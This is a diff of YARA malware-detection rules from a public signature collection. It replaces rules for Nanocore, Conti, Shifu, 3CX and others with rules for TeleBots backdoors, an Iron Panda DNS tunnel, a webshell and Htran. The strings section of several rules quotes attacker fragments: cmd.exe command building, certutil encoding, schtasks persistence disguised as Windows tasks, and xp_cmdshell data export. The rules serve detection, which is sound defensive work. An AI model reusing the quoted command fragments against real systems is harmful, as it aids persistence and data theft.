-		$s2 = "FileCommand" fullword ascii
-		$s3 = "PipeExists" fullword ascii
-		$s4 = "PipeCreated" fullword ascii
-		$s5 = "IClientLoggingHost" fullword ascii
+		hash1 = "eb31a918ccc1643d069cf08b7958e2760e8551ba3b88ea9e5d496e07437273b2"
+
+	strings:
+		$s1 = "cmd = \"cmd.exe /c \" + arg + \" >\" + outfile +\" 2>&1\"" fullword ascii
+		$s2 = "GetTemp = \"c:\\WINDOWS\\addins\"" fullword ascii
+		$s3 = "elseif (arg0 = \"-dump\") Then" fullword ascii
+		$s4 = "decode = \"certutil -decode \" + source + \" \" + dest  " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of them )
+		( uint16( 0 ) == 0x6553 and filesize < 8KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Feb18_2 : FILE
+rule SIGNATURE_BASE_Telebots_VBS_Backdoor_2 : FILE
 {
 	meta:
-		description = "Detects Nanocore RAT"
+		description = "Detects TeleBots malware - VBS Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "83a8ad4d-0bef-5ba2-aa10-eac5601f2c7b"
-		date = "2018-02-19"
+		id = "151849af-f1d0-529c-94f2-287312f6515e"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "Internal Research - T2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nanocore_rat.yar#L117-L137"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L108-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c104e431a4ecc0d18d7eb74e7a55d32bf8978ee922637d48f3f6a9466a0f5b1a"
+		logic_hash = "299a2ca6eacc29b4a7697a8502a56cffda4f6bc6b3354d3cc133712c1755c476"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "377ef8febfd8df1a57a7966043ff0c7b8f3973c2cf666136e6c04080bbf9881a"
+		hash1 = "1b2a5922b58c8060844b43e14dfa5b0c8b119f281f54a46f0f1c34accde71ddb"
 
 	strings:
-		$s1 = "ResManagerRunnable" fullword ascii
-		$s2 = "TransformRunnable" fullword ascii
-		$s3 = "MethodInfoRunnable" fullword ascii
-		$s4 = "ResRunnable" fullword ascii
-		$s5 = "RunRunnable" fullword ascii
-		$s6 = "AsmRunnable" fullword ascii
-		$s7 = "ReadRunnable" fullword ascii
-		$s8 = "ExitRunnable" fullword ascii
+		$s1 = "cmd = \"cmd.exe /c \" + arg + \" \" + arg2" fullword ascii
+		$s2 = "Dim WMI:  Set WMI = GetObject(\"winmgmts:\\\\.\\root\\cimv2\")" fullword ascii
+		$s3 = "cmd = \"certutil -encode -f \" + source + \" \" + dest" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x6944 and filesize < 30KB and 1 of them ) or ( 2 of them )
 }
-
-rule SIGNATURE_BASE_Corkowdll : FILE
+rule SIGNATURE_BASE_Telebots_Win64_Spy_Keylogger_G : FILE
 {
 	meta:
-		description = "Rule to detect the Corkow DLL files"
-		author = "Group IB"
-		id = "cc9d2bb3-8db3-54a0-bd05-7f054ce84633"
-		date = "2016-01-02"
+		description = "Detects TeleBots malware - Win64 Spy KeyLogger G"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd16a198-1b28-532b-a1ba-70680469ec51"
+		date = "2016-12-14"
 		modified = "2023-12-05"
-		reference = "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_corkow_dll.yar#L3-L24"
+		reference = "https://goo.gl/4if3HG"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_telebots.yar#L125-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "072112c79f20ba08b7ef71d3dacff7eb947b4a27bf6381ce788e229f2f791cdf"
+		logic_hash = "1b4db8f290bd4f943a90669afd5bff6b766d0723fb3ee9c69d7097e737beadc8"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e3f134ae88f05463c4707a80f956a689fba7066bb5357f6d45cba312ad0db68e"
 
 	strings:
-		$binary1 = { 60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3 }
-		$binary2 = { (FF 75 ?? | 53) FF 75 10 FF 75 0C FF 75 08 E8 ?? ?? ?? ?? [3-9] C9 C2 0C 00 }
+		$s1 = "C:\\WRK\\GHook\\gHook\\x64\\Debug\\gHookx64.pdb" fullword ascii
+		$s2 = "Install hooks error!" fullword wide
+		$s4 = "%ls%d.~tmp" fullword wide
+		$s5 = "[*]Window PID > %d: " fullword wide
+		$s6 = "Install hooks ok!" fullword wide
+		$s7 = "[!]Clipboard paste" fullword wide
+		$s9 = "[*] IMAGE : %ls" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $binary* ) and ( pe.exports ( "Control_RunDLL" ) or pe.exports ( "ServiceMain" ) or pe.exports ( "DllGetClassObject" ) ) or ( pe.exports ( "ServiceMain" ) and pe.exports ( "Control_RunDLL" ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Conticrypter
+rule SIGNATURE_BASE_Ironpanda_Dnstunclient : FILE
 {
 	meta:
-		description = "Signature for a crypter associated with Conti"
-		author = "James Quinn, Binary Defense"
-		id = "f2a00655-41a2-5614-9c29-3629c93c0e95"
-		date = "2021-03-17"
+		description = "Iron Panda malware DnsTunClient - file named.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd608176-d7e7-5819-a7d4-e8b89d4a59c2"
+		date = "2015-09-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_conti.yar#L2-L16"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L10-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "256fbd028a91da45049e2e861e16e97201f09cb92ab049eda373c80e6a796726"
-		score = 75
+		hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
+		logic_hash = "07c142f6eb11ecc8ed5f55d6b0cc7110c6268e189f3ce29215f75b7aba91a290"
+		score = 80
 		quality = 85
-		tags = ""
-		tlp = "White"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$handoff1 = {4C 8D 05 ?? ?? ?? ?? 48 C7 44 24 28 00 00 00 00 C7 44 24 20 00 00 00 00 e8}
-		$handoff2 = {C7 ?? 24 ?? 00 00 00 00 89 44 24 ?? C7 ?? 24 ?? ?? ?? ?? ?? C7 ?? 24 ?? 00 00 00 00 }
-		$garbageLoad1 = {53 48 83 EC 20 89 CB 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 01 D8 48 83 C4 20 5B C3}
-		$garbageLoad2 = {55 89 E5 83 EC 18 C7 ?? 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 45 08 52 C9 C3}
+		$s1 = "dnstunclient -d or -domain <domain>" fullword ascii
+		$s2 = "dnstunclient -ip <server ip address>" fullword ascii
+		$s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii
+		$s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii
+		$s5 = "taskkill /im conime.exe" fullword ascii
+		$s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" ascii
+		$s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii
+		$s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii
+		$s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii
+		$s10 = "Coversation produce one error:%s,coversation fail" fullword ascii
+		$s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii
 
 	condition:
-		1 of ( $handoff* ) and 1 of ( $garbageLoad* )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_HKTL_Khepri_Beacon_Sep21_1 : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware1 : FILE
 {
 	meta:
-		description = "Detects Khepri C2 framework beacons"
+		description = "Iron Panda Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2c8aaf7-7953-55a3-8499-565800fa01f1"
-		date = "2021-09-08"
+		id = "14dc2611-4ca9-5dd2-ad00-9397a18d7be2"
+		date = "2015-09-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/geemion/Khepri/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_khepri.yar#L2-L44"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L38-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c688dbda6006ef28305285f6aeec24a23cbfe9174d09cf4e3586bd0cf7290e60"
-		score = 90
+		hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
+		logic_hash = "4b50a2c7f0f94b678fc560eefb217c067e934f8e7d64bc0f0d16afcccccd0d08"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "86c48679db5f4c085fd741ebec5235bc6cf0cdf8ef2d98fd8a689ceb5088f431"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "NT %d.%d Build %d  ProductType:%s" ascii fullword
-		$xe1 = "YzIuQ01EUEFSQU0uY21k" ascii
-		$xe2 = "MyLkNNRFBBUkFNLmNtZ" ascii
-		$xe3 = "jMi5DTURQQVJBTS5jbW" ascii
-		$sx1 = "c2.ProcessItem.user" ascii fullword
-		$sx2 = "c2.CMDPARAM.cmd" ascii fullword
-		$sx3 = "c2.DownLoadFile.file_path" ascii fullword
-		$sa1 = "file size zero"
-		$sa2 = "cmd.exe /c "
-		$sa3 = "error parse param"
-		$sa4 = "innet_ip"
-		$op1 = { c3 b9 b4 98 49 00 87 01 5d c3 b8 b8 98 49 00 c3 8b ff }
-		$op2 = { 8b f1 80 3d 58 97 49 00 00 0f 85 96 00 00 00 33 c0 40 b9 50 97 49 00 87 01 33 db }
-		$op3 = { 90 d5 0c 43 00 34 0d 43 00 ea 0c 43 00 7e 0d 43 00 b6 0d 43 00 cc }
-		$op4 = { 69 c0 ff 00 00 00 8b 4d c0 23 88 40 7c 49 00 89 4d c0 8b 45 cc 0b 45 c0 89 45 cc 8b 45 d0 }
+		$x1 = "activedsimp.dll" fullword wide
+		$s1 = "get_BadLoginAddress" fullword ascii
+		$s2 = "get_LastFailedLogin" fullword ascii
+		$s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
+		$s4 = "get_PasswordExpirationDate" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 ) and filesize < 2000KB and ( 1 of ( $x* ) or 2 of ( $sx* ) or all of ( $sa* ) or 3 of ( $op* ) ) or ( filesize < 10MB and 1 of ( $xe* ) ) or 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Shifu_Banking_Trojan : FILE
+rule SIGNATURE_BASE_Ironpanda_Webshell_JSP : FILE
 {
 	meta:
-		description = "Detects Shifu Banking Trojan"
+		description = "Iron Panda Malware JSP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e86a98b1-a5c3-57b6-9449-dc36c04cebf3"
-		date = "2015-09-01"
+		id = "38125418-7867-5073-a731-4f1d64e07588"
+		date = "2015-09-16"
 		modified = "2023-12-05"
-		reference = "https://securityintelligence.com/shifu-masterful-new-banking-trojan-is-attacking-14-japanese-banks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_shifu_trojan.yar#L8-L27"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L57-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f65fa80638e6a8bf8c5afb3dbe1262572ca0a7c56507369934ac3d958f3e6267"
+		hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
+		logic_hash = "747ce812b156bf03f8d14ef84e7d2e8535c7c70590dfcb50ce3e957bec745efc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ff1ebea2096f318a2252ebe1726bcf3bbc295da9204b6c720b5bbf14de14bb2"
-		hash2 = "4881c7d89c2b5e934d4741a653fbdaf87cc5e7571b68c723504069d519d8a737"
 
 	strings:
-		$x1 = "c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdb" fullword ascii
-		$s1 = "listen above" fullword wide
-		$s2 = "familycould cost" fullword wide
-		$s3 = "SetSystemTimeAdjustment" fullword ascii
-		$s4 = "PeekNamedPipe" fullword ascii
+		$s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
+		$s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
+		$s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( $x1 or all of ( $s* ) )
+		filesize < 330KB and 1 of them
 }
-rule SIGNATURE_BASE_SHIFU_Banking_Trojan : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware_Htran : FILE
 {
 	meta:
-		description = "Detects SHIFU Banking Trojan"
+		description = "Iron Panda Malware Htran"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0d57a2b-31cc-5af0-84c3-5d178e2d244d"
-		date = "2015-10-31"
+		id = "7215f0da-9367-59b4-a78b-aeeebc4f2b69"
+		date = "2015-09-16"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/52n8WE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_shifu_trojan.yar#L29-L63"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L74-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01f5217ee4e81b0b2ff37ccc7eed353ace26aa68538cce5bc207c0c071f0850a"
-		score = 70
-		quality = 85
+		hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
+		logic_hash = "e7312a2d0ffc247eda20cb5453538a501bde6683bf34e7f4bf2230243474ba76"
+		score = 75
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
-		hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
-		hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
-		hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
-		hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
-		hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
-		hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
-		hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
-		hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
-		hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
-		hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
-		hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
-		hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
-		hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
 
 	strings:
-		$x1 = "\\Gather\\Dividerail.pdb" ascii
-		$s0 = "\\payload\\payload.x86.pdb" ascii
-		$s1 = "USER_PRIV_GUEST" fullword wide
-		$s2 = "USER_PRIV_ADMIN" fullword wide
-		$s3 = "USER_PRIV_USER" fullword wide
-		$s4 = "PPSWVPP" fullword ascii
-		$s5 = "WinSCard.dll" fullword ascii
+		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+		$s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s4 = "[-] ERROR: Must supply logfile name." fullword ascii
+		$s5 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s6 = "[+] Make a Connection to %s:%d...." fullword ascii
+		$s7 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s9 = "[+] Make a Connection to %s:%d ......" fullword ascii
+		$s10 = "cmshared_get_ptr_from_atom" fullword ascii
+		$s11 = "_cmshared_get_ptr_from_atom" ascii
+		$s12 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s13 = "[-] TransmitPort invalid." fullword ascii
+		$s14 = "[+] Waiting for Client on port:%d ......" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $x1 or 5 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 125KB and 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_MAL_Coralwave_Lenovospkvol_Remcosmicdrop : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware2 : FILE
 {
 	meta:
-		description = "CoralWave loader masquerading as Lenovo audio DLL. Drops Remcos RAT."
-		author = "xstp"
-		id = "8d9c826f-135d-5a90-b8f6-33d235dff7e6"
-		date = "2026-01-01"
-		modified = "2026-01-02"
-		reference = "https://bazaar.abuse.ch/sample/050edadedd7947bc6418f7856a29df5b7b5550bf5eec7f5f37e9a7e1713036f6/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_coralwave_remcos_dropper.yar#L1-L29"
+		description = "Iron Panda Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63916f73-808d-5dc7-86f3-05c8b9c5650d"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L104-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "65302b435a5bc30e8f0215455679635ec50b5b1caba9e55f9258d17c7238be54"
-		logic_hash = "ec6303584d65cf2138ca44a1cf5e958586d9eee2e9e17a90d0942b1ebee3d01f"
-		score = 85
+		hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
+		logic_hash = "060c681e7127349464cd98f99cef6e184fbd18d2ec415dc6c95d8ac329e6fe7e"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$stub_1 = "BAyXuHpAGwdG8ebXF3GvZ32vO3ORY" ascii
-		$stub_2 = "IK5HT1XPlj3LoFkKi3YC4QwYQs7s" ascii
-		$stub_3 = "Xmk61GHDjDfjUjJhNjwDPXxM1Cdg" ascii
-		$fake_1 = "GetVolumeLevel" ascii
-		$fake_2 = "OpenSpeakerVolumeInterface" ascii
-		$fake_3 = "SetMuteState" ascii
-		$mutex = "Rmc-245S33" wide ascii
-		$log_file = "logs.dat" wide ascii
-		$audio_folder = "MicRecords" wide ascii
+		$s0 = "\\setup.exe" ascii
+		$s1 = "msi.dll.urlUT" fullword ascii
+		$s2 = "msi.dllUT" fullword ascii
+		$s3 = "setup.exeUT" fullword ascii
+		$s4 = "/c del /q %s" fullword ascii
 
 	condition:
-		filesize < 5MB and uint16( 0 ) == 0x5A4D and ( 2 of ( $stub_* ) or ( 2 of ( $fake_* ) and 1 of ( $mutex , $log_file , $audio_folder ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_CMD_Var_Expansion : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware3 : FILE
 {
 	meta:
-		description = "Detects Office droppers that include a variable expansion string"
+		description = "Iron Panda Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f3ebea0-1d33-513d-b32b-9d87607525e8"
-		date = "2018-09-26"
+		id = "bc3094ab-9dc8-5b9d-aa13-28daa7d5c13f"
+		date = "2015-09-16"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/asfakian/status/1044859525675843585"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_cmd_var_expansion.yar#L2-L14"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L123-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "68ce14cac07494645f3b5f1d61012e4fe21cfa9fa7ad4019add2368b568fe043"
-		score = 60
-		quality = 85
+		hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
+		logic_hash = "ca55fc5aa655fb221808b4c82db520cae24e0d93422293b6ed5e573b343e93ac"
+		score = 75
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = " /V:ON" ascii wide fullword
+		$s0 = "PluginDeflater.exe" fullword wide
+		$s1 = ".Deflated" fullword wide
+		$s2 = "PluginDeflater" fullword ascii
+		$s3 = "DeflateStream" fullword ascii
+		$s4 = "CompressionMode" fullword ascii
+		$s5 = "System.IO.Compression" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1
+		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
 }
-
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_1 : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware4 : FILE
 {
 	meta:
-		description = "Detects malicious DLLs related to 3CX compromise"
-		author = "X__Junior, Florian Roth (Nextron Systems)"
-		id = "a6ea3299-fde5-5206-b5db-eb3a3f5944d9"
-		date = "2023-03-29"
-		modified = "2023-04-20"
-		reference = "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L3-L30"
+		description = "Iron Panda Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0a72c1e1-b442-52d4-af52-b863abe5ba3c"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_irontiger.yar#L143-L159"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "68f4007791d365900c84e32e076aa3cac9f3a9ed46de297f1005306554ee13f5"
-		score = 85
+		hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
+		logic_hash = "12661c8862eeb82d55a3912e0a499beb6bb19f7abe9ccfe6fa0506e6a032cfe4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
-		hash3 = "cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$opa1 = { 4C 89 F1 4C 89 EA 41 B8 40 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 F0 FF 15 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B 01 4C 89 F1 4C 89 EA FF 15 }
-		$opa2 = { 48 C7 44 24 ?? 00 00 00 00 4C 8D 7C 24 ?? 48 89 F9 48 89 C2 41 89 E8 4D 89 F9 FF 15 ?? ?? ?? ?? 41 83 3F 00 0F 84 ?? ?? ?? ?? 0F B7 03 3D 4D 5A 00 00}
-		$opa3 = { 41 80 7C 00 ?? FE 75 ?? 41 80 7C 00 ?? ED 75 ?? 41 80 7C 00 ?? FA 75 ?? 41 80 3C 00 CE}
-		$opa4 = { 44 0F B6 CD 46 8A 8C 0C ?? ?? ?? ?? 45 30 0C 0E 48 FF C1}
-		$opb1 = { 41 B8 40 00 00 00 49 8B D5 49 8B CC FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 FF D4 44 8B 45 ?? 4C 8D 4D ?? 49 8B D5 49 8B CC FF 15 }
-		$opb2 = { 44 8B C3 48 89 44 24 ?? 48 8B 5C 24 ?? 4C 8D 4D ?? 48 8B CB 48 89 74 24 ?? 48 8B D0 4C 8B F8 FF 15 }
-		$opb3 = { 80 78 ?? FE 75 ?? 80 78 ?? ED 75 ?? 80 38 FA 75 ?? 80 78 ?? CE }
-		$opb4 = { 49 63 C1 44 0F B6 44 05 ?? 44 88 5C 05 ?? 44 88 02 0F B6 54 05 ?? 49 03 D0 0F B6 C2 0F B6 54 05 ?? 41 30 12}
+		$s0 = "TestPlugin.dll" fullword wide
+		$s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
+		$s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
+		$s6 = "TestPlugin" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and pe.characteristics & pe.DLL and ( 2 of ( $opa* ) or 2 of ( $opb* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_2 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Proxytoken_Exploitation_Aug21_1 : CVE_2021_33766
 {
 	meta:
-		description = "Detects malicious DLLs related to 3CX compromise (decrypted payload)"
+		description = "Detects ProxyToken CVE-2021-33766 exploitation attempts on an unpatched system"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf3597ff-d62b-5d21-9c9b-e46e685284cf"
-		date = "2023-03-29"
+		id = "f4840140-6d31-52f9-b1a0-2acdd4b955cd"
+		date = "2021-08-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/dan__mayer/status/1641170769194672128?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_3cx_compromise_mar23.yar#L32-L54"
+		reference = "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2021_33766_proxytoken.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
